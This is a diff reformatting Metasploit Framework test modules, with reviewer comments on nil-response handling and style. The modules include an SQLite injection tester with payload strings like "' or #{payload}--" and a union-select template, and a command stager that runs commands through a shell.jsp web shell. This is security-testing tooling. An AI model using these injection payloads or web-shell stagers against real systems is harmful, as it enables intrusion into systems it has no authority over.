mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'hp', user: FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF)
|
||||||
end
|
end
|
||||||
|
|
||||||
def test_doliwamp_traversal_creds
|
def test_doliwamp_traversal_creds
|
||||||
|
@ -480,11 +482,12 @@ class MetasploitModule < Msf::Auxiliary
|
||||||
end
|
end
|
||||||
|
|
||||||
def run
|
def run
|
||||||
counter_all = 0
|
counter_all = 0
|
||||||
counter_good = 0
|
counter_good = 0
|
||||||
counter_bad = 0
|
counter_bad = 0
|
||||||
self.methods.each do |m|
|
self.methods.each do |m|
|
||||||
next if m.to_s !~ /^test_.+/
|
next if m.to_s !~ /^test_.+/
|
||||||
|
|
||||||
print_status("Trying: ##{m.to_s}")
|
print_status("Trying: ##{m.to_s}")
|
||||||
begin
|
begin
|
||||||
self.send(m)
|
self.send(m)
|
||||||
|
@ -492,7 +495,7 @@ class MetasploitModule < Msf::Auxiliary
|
||||||
counter_good += 1
|
counter_good += 1
|
||||||
rescue ::Exception => e
|
rescue ::Exception => e
|
||||||
print_error("That blew up :-(")
|
print_error("That blew up :-(")
|
||||||
print_line("#{e.class} #{e.message}\n#{e.backtrace*"\n"}")
|
print_line("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
|
||||||
counter_bad += 1
|
counter_bad += 1
|
||||||
ensure
|
ensure
|
||||||
print_line
|
print_line
|
||||||
|
|
|
@ -3,25 +3,23 @@
|
||||||
# Current source: https://github.com/rapid7/metasploit-framework
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
##
|
##
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
class MetasploitModule < Msf::Auxiliary
|
class MetasploitModule < Msf::Auxiliary
|
||||||
|
|
||||||
include Msf::Auxiliary::Scanner
|
include Msf::Auxiliary::Scanner
|
||||||
|
|
||||||
def initialize
|
def initialize
|
||||||
super(
|
super(
|
||||||
'Name' => 'Simple Recon Module Tester',
|
'Name' => 'Simple Recon Module Tester',
|
||||||
'Description' => 'Simple Recon Module Tester',
|
'Description' => 'Simple Recon Module Tester',
|
||||||
'Author' => 'hdm',
|
'Author' => 'hdm',
|
||||||
'License' => MSF_LICENSE
|
'License' => MSF_LICENSE
|
||||||
)
|
)
|
||||||
|
|
||||||
register_options(
|
register_options(
|
||||||
[
|
[
|
||||||
Opt::RPORT,
|
Opt::RPORT,
|
||||||
], self.class)
|
], self.class
|
||||||
|
)
|
||||||
end
|
end
|
||||||
|
|
||||||
def run_batch_size
|
def run_batch_size
|
||||||
|
|
|
@ -3,25 +3,23 @@
|
||||||
# Current source: https://github.com/rapid7/metasploit-framework
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
##
|
##
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
class MetasploitModule < Msf::Auxiliary
|
class MetasploitModule < Msf::Auxiliary
|
||||||
|
|
||||||
include Msf::Auxiliary::Scanner
|
include Msf::Auxiliary::Scanner
|
||||||
|
|
||||||
def initialize
|
def initialize
|
||||||
super(
|
super(
|
||||||
'Name' => 'Simple Recon Module Tester',
|
'Name' => 'Simple Recon Module Tester',
|
||||||
'Description' => 'Simple Recon Module Tester',
|
'Description' => 'Simple Recon Module Tester',
|
||||||
'Author' => 'hdm',
|
'Author' => 'hdm',
|
||||||
'License' => MSF_LICENSE
|
'License' => MSF_LICENSE
|
||||||
)
|
)
|
||||||
|
|
||||||
register_options(
|
register_options(
|
||||||
[
|
[
|
||||||
Opt::RPORT,
|
Opt::RPORT,
|
||||||
], self.class)
|
], self.class
|
||||||
|
)
|
||||||
end
|
end
|
||||||
|
|
||||||
def run_host(ip)
|
def run_host(ip)
|
||||||
|
|
|
@ -3,33 +3,34 @@
|
||||||
# Current source: https://github.com/rapid7/metasploit-framework
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
##
|
##
|
||||||
|
|
||||||
|
|
||||||
class MetasploitModule < Msf::Auxiliary
|
class MetasploitModule < Msf::Auxiliary
|
||||||
|
|
||||||
include Msf::Auxiliary::Report
|
include Msf::Auxiliary::Report
|
||||||
include Msf::Exploit::Remote::HttpClient
|
include Msf::Exploit::Remote::HttpClient
|
||||||
|
|
||||||
def initialize(info = {})
|
def initialize(info = {})
|
||||||
super(update_info(info,
|
super(
|
||||||
'Name' => "Check Test",
|
update_info(
|
||||||
'Description' => %q{
|
info,
|
||||||
This module ensures that 'check' actually functions for Auxiilary modules.
|
'Name' => "Check Test",
|
||||||
},
|
'Description' => %q{
|
||||||
'References' =>
|
This module ensures that 'check' actually functions for Auxiilary modules.
|
||||||
[
|
},
|
||||||
|
'References' => [
|
||||||
[ 'OSVDB', '0' ]
|
[ 'OSVDB', '0' ]
|
||||||
],
|
],
|
||||||
'Author' =>
|
'Author' => [
|
||||||
[
|
|
||||||
'todb'
|
'todb'
|
||||||
],
|
],
|
||||||
'License' => MSF_LICENSE
|
'License' => MSF_LICENSE
|
||||||
))
|
)
|
||||||
|
)
|
||||||
|
|
||||||
register_options(
|
register_options(
|
||||||
[
|
[
|
||||||
Opt::RPORT(80)
|
Opt::RPORT(80)
|
||||||
], self.class)
|
], self.class
|
||||||
|
)
|
||||||
end
|
end
|
||||||
|
|
||||||
def check
|
def check
|
||||||
|
|
|
@ -8,18 +8,16 @@ class MetasploitModule < Msf::Auxiliary
|
||||||
update_info(
|
update_info(
|
||||||
info,
|
info,
|
||||||
'Name' => 'SQLite injection testing module',
|
'Name' => 'SQLite injection testing module',
|
||||||
'Description' => '
|
'Description' => %q{
|
||||||
This module tests the SQL injection library against the SQLite database management system
|
This module tests the SQL injection library against the SQLite database management system
|
||||||
The target : https://github.com/incredibleindishell/sqlite-lab
|
The target : https://github.com/incredibleindishell/sqlite-lab
|
||||||
',
|
},
|
||||||
'Author' =>
|
'Author' => [
|
||||||
[
|
'Redouane NIBOUCHA <rniboucha[at]yahoo.fr>'
|
||||||
'Redouane NIBOUCHA <rniboucha[at]yahoo.fr>'
|
],
|
||||||
],
|
|
||||||
'License' => MSF_LICENSE,
|
'License' => MSF_LICENSE,
|
||||||
'Platform' => %w[linux],
|
'Platform' => %w[linux],
|
||||||
'References' =>
|
'References' => [],
|
||||||
[],
|
|
||||||
'Targets' => [['Wildcard Target', {}]],
|
'Targets' => [['Wildcard Target', {}]],
|
||||||
'DefaultTarget' => 0
|
'DefaultTarget' => 0
|
||||||
)
|
)
|
||||||
|
@ -41,18 +39,18 @@ class MetasploitModule < Msf::Auxiliary
|
||||||
def boolean_blind
|
def boolean_blind
|
||||||
encoder = datastore['Encoder'].empty? ? nil : datastore['Encoder'].intern
|
encoder = datastore['Encoder'].empty? ? nil : datastore['Encoder'].intern
|
||||||
sqli = create_sqli(dbms: SQLitei::BooleanBasedBlind, opts: {
|
sqli = create_sqli(dbms: SQLitei::BooleanBasedBlind, opts: {
|
||||||
encoder: encoder,
|
encoder: encoder,
|
||||||
hex_encode_strings: datastore['HexEncodeStrings'],
|
hex_encode_strings: datastore['HexEncodeStrings'],
|
||||||
safe: datastore['Safe']
|
safe: datastore['Safe']
|
||||||
}) do |payload|
|
}) do |payload|
|
||||||
res = send_request_cgi({
|
res = send_request_cgi({
|
||||||
'uri' => normalize_uri(target_uri.path, 'index.php'),
|
'uri' => normalize_uri(target_uri.path, 'index.php'),
|
||||||
'method' => 'POST',
|
'method' => 'POST',
|
||||||
'vars_post' => {
|
'vars_post' => {
|
||||||
'tag' => "' or #{payload}--",
|
'tag' => "' or #{payload}--",
|
||||||
'search' => 'Check Plan'
|
'search' => 'Check Plan'
|
||||||
}
|
}
|
||||||
})
|
})
|
||||||
res.body.include?('Dear')
|
res.body.include?('Dear')
|
||||||
end
|
end
|
||||||
unless sqli.test_vulnerable
|
unless sqli.test_vulnerable
|
||||||
|
@ -66,18 +64,18 @@ class MetasploitModule < Msf::Auxiliary
|
||||||
encoder = datastore['Encoder'].empty? ? nil : datastore['Encoder'].intern
|
encoder = datastore['Encoder'].empty? ? nil : datastore['Encoder'].intern
|
||||||
truncation = datastore['TruncationLength'] <= 0 ? nil : datastore['TruncationLength']
|
truncation = datastore['TruncationLength'] <= 0 ? nil : datastore['TruncationLength']
|
||||||
sqli = create_sqli(dbms: SQLitei::Common, opts: {
|
sqli = create_sqli(dbms: SQLitei::Common, opts: {
|
||||||
encoder: encoder,
|
encoder: encoder,
|
||||||
hex_encode_strings: datastore['HexEncodeStrings'],
|
hex_encode_strings: datastore['HexEncodeStrings'],
|
||||||
truncation_length: truncation,
|
truncation_length: truncation,
|
||||||
safe: datastore['Safe']
|
safe: datastore['Safe']
|
||||||
}) do |payload|
|
}) do |payload|
|
||||||
res = send_request_cgi({
|
res = send_request_cgi({
|
||||||
'uri' => normalize_uri(target_uri.path, 'index.php'),
|
'uri' => normalize_uri(target_uri.path, 'index.php'),
|
||||||
'method' => 'GET',
|
'method' => 'GET',
|
||||||
'vars_get' => {
|
'vars_get' => {
|
||||||
'tag' => "' and 1=2 union select 1,(#{payload}),3,4,5--"
|
'tag' => "' and 1=2 union select 1,(#{payload}),3,4,5--"
|
||||||
}
|
}
|
||||||
})
|
})
|
||||||
if !res
|
if !res
|
||||||
''
|
''
|
||||||
else
|
else
|
||||||
|
@ -100,18 +98,18 @@ class MetasploitModule < Msf::Auxiliary
|
||||||
def time_blind
|
def time_blind
|
||||||
encoder = datastore['Encoder'].empty? ? nil : datastore['Encoder'].intern
|
encoder = datastore['Encoder'].empty? ? nil : datastore['Encoder'].intern
|
||||||
sqli = create_sqli(dbms: SQLitei::TimeBasedBlind, opts: {
|
sqli = create_sqli(dbms: SQLitei::TimeBasedBlind, opts: {
|
||||||
encoder: encoder,
|
encoder: encoder,
|
||||||
hex_encode_strings: datastore['HexEncodeStrings'],
|
hex_encode_strings: datastore['HexEncodeStrings'],
|
||||||
safe: datastore['Safe']
|
safe: datastore['Safe']
|
||||||
}) do |payload|
|
}) do |payload|
|
||||||
res = send_request_cgi({
|
res = send_request_cgi({
|
||||||
'uri' => normalize_uri(target_uri.path, 'index.php'),
|
'uri' => normalize_uri(target_uri.path, 'index.php'),
|
||||||
'method' => 'POST',
|
'method' => 'POST',
|
||||||
'vars_post' => {
|
'vars_post' => {
|
||||||
'tag' => "' or #{payload}--",
|
'tag' => "' or #{payload}--",
|
||||||
'search' => 'Check Plan'
|
'search' => 'Check Plan'
|
||||||
}
|
}
|
||||||
})
|
})
|
||||||
raise ArgumentError unless res
|
raise ArgumentError unless res
|
||||||
end
|
end
|
||||||
unless sqli.test_vulnerable
|
unless sqli.test_vulnerable
|
||||||
|
@ -141,9 +139,9 @@ class MetasploitModule < Msf::Auxiliary
|
||||||
|
|
||||||
def check
|
def check
|
||||||
res = send_request_cgi({
|
res = send_request_cgi({
|
||||||
'uri' => normalize_uri(target_uri.path, 'index.php'),
|
'uri' => normalize_uri(target_uri.path, 'index.php'),
|
||||||
'method' => 'GET'
|
'method' => 'GET'
|
||||||
})
|
})
|
||||||
if res&.body&.include?('--==[[IndiShell Lab]]==--')
|
if res&.body&.include?('--==[[IndiShell Lab]]==--')
|
||||||
Exploit::CheckCode::Vulnerable
|
Exploit::CheckCode::Vulnerable
|
||||||
else
|
else
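Review bot: In `boolean_blind` the oracle block ends with `res.body.include?('Dear')`, which raises NoMethodError when `send_request_cgi` returns nil for a dropped or timed-out request. The other paths in this file already guard against that: the union-based block tests `if !res`, `time_blind` has `raise ArgumentError unless res`, and `check` uses `res&.body&.include?`. Adding `raise ArgumentError, 'no response from target' unless res` before the `include?` line matches `time_blind` and avoids reading a lost request as a false answer, which `res&.body&.include?('Dear')` would silently do. The bodies of `boolean_blind` and `time_blind` continue past `unless sqli.test_vulnerable`, outside the hunks.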
|
||||||
|
|
|
@ -3,29 +3,27 @@
|
||||||
# Current source: https://github.com/rapid7/metasploit-framework
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
##
|
##
|
||||||
|
|
||||||
|
|
||||||
class MetasploitModule < Msf::Exploit::Remote
|
class MetasploitModule < Msf::Exploit::Remote
|
||||||
Rank = ManualRanking
|
Rank = ManualRanking
|
||||||
|
|
||||||
include Msf::Exploit::Remote::Tcp
|
include Msf::Exploit::Remote::Tcp
|
||||||
|
|
||||||
def initialize(info = {})
|
def initialize(info = {})
|
||||||
super(update_info(info,
|
super(
|
||||||
'Name' => 'Internal Aggressive Test Exploit',
|
update_info(
|
||||||
'Description' =>
|
info,
|
||||||
"This module tests the exploitation of a test service.",
|
'Name' => 'Internal Aggressive Test Exploit',
|
||||||
'Author' => 'skape',
|
'Description' => "This module tests the exploitation of a test service.",
|
||||||
'License' => MSF_LICENSE,
|
'Author' => 'skape',
|
||||||
'Arch' => 'x86',
|
'License' => MSF_LICENSE,
|
||||||
'Payload' =>
|
'Arch' => 'x86',
|
||||||
{
|
'Payload' => {
|
||||||
'Space' => 1000,
|
'Space' => 1000,
|
||||||
'MaxNops' => 0,
|
'MaxNops' => 0,
|
||||||
'BadChars' => "\x00",
|
'BadChars' => "\x00",
|
||||||
'StackAdjustment' => -3500,
|
'StackAdjustment' => -3500,
|
||||||
},
|
},
|
||||||
'Targets' =>
|
'Targets' => [
|
||||||
[
|
|
||||||
# Target 0: Universal
|
# Target 0: Universal
|
||||||
[
|
[
|
||||||
'Any Platform',
|
'Any Platform',
|
||||||
|
@ -37,13 +35,13 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
'Test encoder specific',
|
'Test encoder specific',
|
||||||
{
|
{
|
||||||
'Platform' => [ 'linux', 'win' ],
|
'Platform' => [ 'linux', 'win' ],
|
||||||
'Payload' =>
|
'Payload' =>
|
||||||
{
|
{
|
||||||
'EncoderType' => Msf::Encoder::Type::AlphanumUpper,
|
'EncoderType' => Msf::Encoder::Type::AlphanumUpper,
|
||||||
'EncoderOptions' =>
|
'EncoderOptions' =>
|
||||||
{
|
{
|
||||||
'BufferRegister' => 'EBX',
|
'BufferRegister' => 'EBX',
|
||||||
'BufferOffset' => 4
|
'BufferOffset' => 4
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
},
|
},
|
||||||
|
@ -52,32 +50,35 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
'Cannot be encoded',
|
'Cannot be encoded',
|
||||||
{
|
{
|
||||||
'Platform' => [ 'linux', 'win' ],
|
'Platform' => [ 'linux', 'win' ],
|
||||||
'Payload' =>
|
'Payload' =>
|
||||||
{
|
{
|
||||||
'BadChars' => (0..255).to_a.map { |x| x.chr }.to_s
|
'BadChars' => (0..255).to_a.map { |x| x.chr }.to_s
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
],
|
],
|
||||||
[ 'Test context encoder',
|
[
|
||||||
|
'Test context encoder',
|
||||||
{
|
{
|
||||||
'Platform' => [ 'linux', 'win' ],
|
'Platform' => [ 'linux', 'win' ],
|
||||||
'Payload' =>
|
'Payload' =>
|
||||||
{
|
{
|
||||||
'BadChars' => "\x00"
|
'BadChars' => "\x00"
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
]
|
]
|
||||||
],
|
],
|
||||||
'DefaultTarget' => 0))
|
'DefaultTarget' => 0
|
||||||
|
)
|
||||||
|
)
|
||||||
|
|
||||||
register_options(
|
register_options(
|
||||||
[
|
[
|
||||||
OptBool.new('WaitForInput', [ false, "Wait for user input before returning from exploit", false ]),
|
OptBool.new('WaitForInput', [ false, "Wait for user input before returning from exploit", false ]),
|
||||||
OptInt.new('TestInteger', [ false, "Testing an integer value", nil ])
|
OptInt.new('TestInteger', [ false, "Testing an integer value", nil ])
|
||||||
])
|
]
|
||||||
|
)
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
||||||
def autofilter
|
def autofilter
|
||||||
false
|
false
|
||||||
end
|
end
|
||||||
|
@ -89,7 +90,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
def exploit
|
def exploit
|
||||||
# Show disassembled payload for context encoder test
|
# Show disassembled payload for context encoder test
|
||||||
if target.name =~ /context encoder/
|
if target.name =~ /context encoder/
|
||||||
puts Rex::Assembly::Nasm.disassemble(payload.encoded[0,40])
|
puts Rex::Assembly::Nasm.disassemble(payload.encoded[0, 40])
|
||||||
end
|
end
|
||||||
|
|
||||||
connect
|
connect
|
||||||
|
|
|
@ -3,78 +3,77 @@
|
||||||
# Current source: https://github.com/rapid7/metasploit-framework
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
##
|
##
|
||||||
|
|
||||||
|
|
||||||
class MetasploitModule < Msf::Exploit::Remote
|
class MetasploitModule < Msf::Exploit::Remote
|
||||||
Rank = NormalRanking
|
Rank = NormalRanking
|
||||||
|
|
||||||
include Msf::Exploit::Remote::BrowserExploitServer
|
include Msf::Exploit::Remote::BrowserExploitServer
|
||||||
|
|
||||||
def initialize(info={})
|
def initialize(info = {})
|
||||||
super(update_info(info,
|
super(
|
||||||
'Name' => "IE Exploit for BrowserExploitServer Proof-of-Concept",
|
update_info(
|
||||||
'Description' => %q{
|
info,
|
||||||
Here's an example of building an exploit using the BrowserExploitServer.
|
'Name' => "IE Exploit for BrowserExploitServer Proof-of-Concept",
|
||||||
This example requires the target to be exploit. If not, the mixin will
|
'Description' => %q{
|
||||||
send a fake 404 as a way to avoid engaging the target. The example is
|
Here's an example of building an exploit using the BrowserExploitServer.
|
||||||
for Windows only.
|
This example requires the target to be exploit. If not, the mixin will
|
||||||
},
|
send a fake 404 as a way to avoid engaging the target. The example is
|
||||||
'License' => MSF_LICENSE,
|
for Windows only.
|
||||||
'Author' => [ 'sinn3r' ],
|
},
|
||||||
'References' =>
|
'License' => MSF_LICENSE,
|
||||||
[
|
'Author' => [ 'sinn3r' ],
|
||||||
|
'References' => [
|
||||||
[ 'URL', 'https://metasploit.com' ]
|
[ 'URL', 'https://metasploit.com' ]
|
||||||
],
|
],
|
||||||
'Platform' => 'win',
|
'Platform' => 'win',
|
||||||
'BrowserRequirements' =>
|
'BrowserRequirements' => {
|
||||||
{
|
|
||||||
:source => /script|headers/i,
|
:source => /script|headers/i,
|
||||||
#:clsid => "{D27CDB6E-AE6D-11cf-96B8-444553540000}", # ShockwaveFlash.ShockwaveFlash.1
|
# :clsid => "{D27CDB6E-AE6D-11cf-96B8-444553540000}", # ShockwaveFlash.ShockwaveFlash.1
|
||||||
#:method => "LoadMovie",
|
# :method => "LoadMovie",
|
||||||
:os_name => /win/i
|
:os_name => /win/i
|
||||||
},
|
},
|
||||||
'Targets' =>
|
'Targets' => [
|
||||||
[
|
|
||||||
[ 'Automatic', {} ],
|
[ 'Automatic', {} ],
|
||||||
[
|
[
|
||||||
'Windows XP with IE 8',
|
'Windows XP with IE 8',
|
||||||
{
|
{
|
||||||
'os_flavor' => 'XP',
|
'os_flavor' => 'XP',
|
||||||
'ua_name' => 'MSIE',
|
'ua_name' => 'MSIE',
|
||||||
'ua_ver' => '8.0',
|
'ua_ver' => '8.0',
|
||||||
'Rop' => true,
|
'Rop' => true,
|
||||||
'Offset' => 0x100
|
'Offset' => 0x100
|
||||||
}
|
}
|
||||||
],
|
],
|
||||||
[
|
[
|
||||||
'Windows 7 with IE 9',
|
'Windows 7 with IE 9',
|
||||||
{
|
{
|
||||||
'os_flavor' => '7',
|
'os_flavor' => '7',
|
||||||
'ua_name' => 'MSIE',
|
'ua_name' => 'MSIE',
|
||||||
'ua_ver' => '9.0',
|
'ua_ver' => '9.0',
|
||||||
'Rop' => true,
|
'Rop' => true,
|
||||||
'Offset' => 0x100
|
'Offset' => 0x100
|
||||||
}
|
}
|
||||||
],
|
],
|
||||||
[
|
[
|
||||||
'Windows 7 with IE 10',
|
'Windows 7 with IE 10',
|
||||||
{
|
{
|
||||||
'os_flavor' => '7',
|
'os_flavor' => '7',
|
||||||
'ua_name' => 'MSIE',
|
'ua_name' => 'MSIE',
|
||||||
'ua_ver' => '10.0',
|
'ua_ver' => '10.0',
|
||||||
'Rop' => true,
|
'Rop' => true,
|
||||||
'Offset' => 0x100
|
'Offset' => 0x100
|
||||||
}
|
}
|
||||||
]
|
]
|
||||||
],
|
],
|
||||||
|
|
||||||
'Payload' =>
|
'Payload' => {
|
||||||
{
|
'BadChars' => "\x00", # Our spray doesn't like null bytes
|
||||||
'BadChars' => "\x00", #Our spray doesn't like null bytes
|
|
||||||
'StackAdjustment' => -3500
|
'StackAdjustment' => -3500
|
||||||
},
|
},
|
||||||
'Privileged' => false,
|
'Privileged' => false,
|
||||||
'DisclosureDate' => '2013-04-01',
|
'DisclosureDate' => '2013-04-01',
|
||||||
'DefaultTarget' => 0))
|
'DefaultTarget' => 0
|
||||||
|
)
|
||||||
|
)
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
#
|
||||||
|
|
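Review bot: `:os_name => /win/i` under `'BrowserRequirements'` is an unanchored, case-insensitive match, so it accepts any reported OS name that merely contains "win". The Explib2 modules reformatted in this same commit express the requirement as `:os_name => OperatingSystems::WINDOWS`; using that here would keep the check precise and the modules consistent, assuming the constant resolves in this module as it does there. Separately, the description reads "requires the target to be exploit", which presumably should be "exploitable". The class body continues past the end of this hunk.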
|
@ -3,31 +3,32 @@
|
||||||
# Current source: https://github.com/rapid7/metasploit-framework
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
##
|
##
|
||||||
|
|
||||||
|
|
||||||
class MetasploitModule < Msf::Exploit
|
class MetasploitModule < Msf::Exploit
|
||||||
|
|
||||||
def initialize(info = {})
|
def initialize(info = {})
|
||||||
super(update_info(info,
|
super(
|
||||||
'Name' => "Check Test Exploit",
|
update_info(
|
||||||
'Description' => %q{
|
info,
|
||||||
|
'Name' => "Check Test Exploit",
|
||||||
|
'Description' => %q{
|
||||||
This module ensures that 'check' actually functions for Exploit modules.
|
This module ensures that 'check' actually functions for Exploit modules.
|
||||||
},
|
},
|
||||||
'References' =>
|
'References' => [
|
||||||
[
|
|
||||||
[ 'OSVDB', '0' ]
|
[ 'OSVDB', '0' ]
|
||||||
],
|
],
|
||||||
'Author' =>
|
'Author' => [
|
||||||
[
|
|
||||||
'todb'
|
'todb'
|
||||||
],
|
],
|
||||||
'License' => MSF_LICENSE,
|
'License' => MSF_LICENSE,
|
||||||
'DisclosureDate' => '2013-05-23'
|
'DisclosureDate' => '2013-05-23'
|
||||||
))
|
)
|
||||||
|
)
|
||||||
|
|
||||||
register_options(
|
register_options(
|
||||||
[
|
[
|
||||||
Opt::RPORT(80)
|
Opt::RPORT(80)
|
||||||
], self.class)
|
], self.class
|
||||||
|
)
|
||||||
end
|
end
|
||||||
|
|
||||||
def check
|
def check
|
||||||
|
|
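Review bot: The `self.class` argument to `register_options` looks unnecessary, and after the layout fix the call now ends in `], self.class` followed by a lone `)`. Other modules reformatted in this commit call `register_options` with only the option array, so `register_options([ Opt::RPORT(80) ])` would be consistent with them. The same pattern appears in the Command Stager Web Test (`Opt::RPORT(8080)`) and Command Test (`Opt::RPORT(31337)`) sections. Confirm that the targeted framework version accepts the one-argument form before changing it.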
|
@ -3,7 +3,6 @@
|
||||||
# Current source: https://github.com/rapid7/metasploit-framework
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
##
|
##
|
||||||
|
|
||||||
|
|
||||||
class MetasploitModule < Msf::Exploit::Remote
|
class MetasploitModule < Msf::Exploit::Remote
|
||||||
Rank = ManualRanking
|
Rank = ManualRanking
|
||||||
# =( need more targets and perhaps more OS specific return values OS specific would be preferred
|
# =( need more targets and perhaps more OS specific return values OS specific would be preferred
|
||||||
|
@ -12,47 +11,48 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
include Msf::Exploit::CmdStager
|
include Msf::Exploit::CmdStager
|
||||||
|
|
||||||
def initialize(info = {})
|
def initialize(info = {})
|
||||||
super(update_info(info,
|
super(
|
||||||
'Name' => 'Command Stager Web Test',
|
update_info(
|
||||||
'Description' => %q{
|
info,
|
||||||
|
'Name' => 'Command Stager Web Test',
|
||||||
|
'Description' => %q{
|
||||||
This module tests the command stager mixin against a shell.jsp application installed
|
This module tests the command stager mixin against a shell.jsp application installed
|
||||||
on an Apache Tomcat server.
|
on an Apache Tomcat server.
|
||||||
},
|
},
|
||||||
'Author' => 'bannedit',
|
'Author' => 'bannedit',
|
||||||
'References' =>
|
'References' => [
|
||||||
[
|
|
||||||
],
|
],
|
||||||
'DefaultOptions' =>
|
'DefaultOptions' => {
|
||||||
{
|
|
||||||
},
|
},
|
||||||
'Payload' =>
|
'Payload' => {
|
||||||
{
|
|
||||||
},
|
},
|
||||||
'Platform' => 'win',
|
'Platform' => 'win',
|
||||||
'Privileged' => true,
|
'Privileged' => true,
|
||||||
'Targets' =>
|
'Targets' => [
|
||||||
[
|
|
||||||
# need more but this will likely cover most cases
|
# need more but this will likely cover most cases
|
||||||
[ 'Automatic Targeting',
|
[
|
||||||
|
'Automatic Targeting',
|
||||||
{
|
{
|
||||||
'auto' => true
|
'auto' => true
|
||||||
}
|
}
|
||||||
],
|
],
|
||||||
],
|
],
|
||||||
'DefaultTarget' => 0,
|
'DefaultTarget' => 0,
|
||||||
'DisclosureDate' => '2010-02-03'))
|
'DisclosureDate' => '2010-02-03'
|
||||||
|
)
|
||||||
|
)
|
||||||
|
|
||||||
register_options(
|
register_options(
|
||||||
[
|
[
|
||||||
Opt::RPORT(8080),
|
Opt::RPORT(8080),
|
||||||
], self.class)
|
], self.class
|
||||||
|
)
|
||||||
end
|
end
|
||||||
|
|
||||||
def autofilter
|
def autofilter
|
||||||
false
|
false
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
||||||
# This is method required for the CmdStager to work...
|
# This is method required for the CmdStager to work...
|
||||||
def execute_command(cmd, opts)
|
def execute_command(cmd, opts)
|
||||||
uri = opts[:uri]
|
uri = opts[:uri]
|
||||||
|
@ -63,7 +63,6 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
end
|
end
|
||||||
|
|
||||||
def exploit
|
def exploit
|
||||||
|
|
||||||
opts = {
|
opts = {
|
||||||
:delay => 0.5,
|
:delay => 0.5,
|
||||||
:uri => "/shell/shell.jsp?cmd=CMDS"
|
:uri => "/shell/shell.jsp?cmd=CMDS"
|
||||||
|
@ -72,7 +71,6 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
execute_cmdstager(opts)
|
execute_cmdstager(opts)
|
||||||
|
|
||||||
handler
|
handler
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
|
@ -3,37 +3,37 @@
|
||||||
# Current source: https://github.com/rapid7/metasploit-framework
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
##
|
##
|
||||||
|
|
||||||
|
|
||||||
class MetasploitModule < Msf::Exploit::Remote
|
class MetasploitModule < Msf::Exploit::Remote
|
||||||
Rank = ManualRanking
|
Rank = ManualRanking
|
||||||
|
|
||||||
include Msf::Exploit::Remote::Dialup
|
include Msf::Exploit::Remote::Dialup
|
||||||
|
|
||||||
def initialize(info = {})
|
def initialize(info = {})
|
||||||
super(update_info(info,
|
super(
|
||||||
'Name' => 'Test Dialup Exploit',
|
update_info(
|
||||||
'Description' => %q{
|
info,
|
||||||
This exploit connects to a system's modem over dialup and provides
|
'Name' => 'Test Dialup Exploit',
|
||||||
the user with a readout of the login banner.
|
'Description' => %q{
|
||||||
},
|
This exploit connects to a system's modem over dialup and provides
|
||||||
'Author' =>
|
the user with a readout of the login banner.
|
||||||
[
|
},
|
||||||
|
'Author' => [
|
||||||
'I)ruid',
|
'I)ruid',
|
||||||
],
|
],
|
||||||
'Arch' => ARCH_TTY,
|
'Arch' => ARCH_TTY,
|
||||||
'Platform' => ['unix'],
|
'Platform' => ['unix'],
|
||||||
'License' => MSF_LICENSE,
|
'License' => MSF_LICENSE,
|
||||||
'Payload' =>
|
'Payload' => {
|
||||||
{
|
'Space' => 1000,
|
||||||
'Space' => 1000,
|
|
||||||
'BadChars' => '',
|
'BadChars' => '',
|
||||||
'DisableNops' => true,
|
'DisableNops' => true,
|
||||||
},
|
},
|
||||||
'Targets' =>
|
'Targets' => [
|
||||||
[
|
[ 'Automatic', {} ],
|
||||||
[ 'Automatic', { } ],
|
|
||||||
],
|
],
|
||||||
'DefaultTarget' => 0))
|
'DefaultTarget' => 0
|
||||||
|
)
|
||||||
|
)
|
||||||
end
|
end
|
||||||
|
|
||||||
def autofilter
|
def autofilter
|
||||||
|
|
|
@ -3,7 +3,6 @@
|
||||||
# Current source: https://github.com/rapid7/metasploit-framework
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
##
|
##
|
||||||
|
|
||||||
|
|
||||||
class MetasploitModule < Msf::Exploit::Remote
|
class MetasploitModule < Msf::Exploit::Remote
|
||||||
Rank = ManualRanking
|
Rank = ManualRanking
|
||||||
|
|
||||||
|
@ -11,43 +10,46 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
include Msf::Exploit::Egghunter
|
include Msf::Exploit::Egghunter
|
||||||
|
|
||||||
def initialize(info = {})
|
def initialize(info = {})
|
||||||
super(update_info(info,
|
super(
|
||||||
'Name' => 'Internal Egghunter Test Exploit',
|
update_info(
|
||||||
'Description' =>
|
info,
|
||||||
"This module tests the exploitation of a test service using the Egghunter.",
|
'Name' => 'Internal Egghunter Test Exploit',
|
||||||
'Author' => 'jduck',
|
'Description' => "This module tests the exploitation of a test service using the Egghunter.",
|
||||||
'License' => MSF_LICENSE,
|
'Author' => 'jduck',
|
||||||
'Arch' => ARCH_X86,
|
'License' => MSF_LICENSE,
|
||||||
'Payload' =>
|
'Arch' => ARCH_X86,
|
||||||
{
|
'Payload' => {
|
||||||
'Space' => 1000,
|
'Space' => 1000,
|
||||||
'MaxNops' => 0,
|
'MaxNops' => 0,
|
||||||
'BadChars' => "\x00",
|
'BadChars' => "\x00",
|
||||||
'StackAdjustment' => -3500,
|
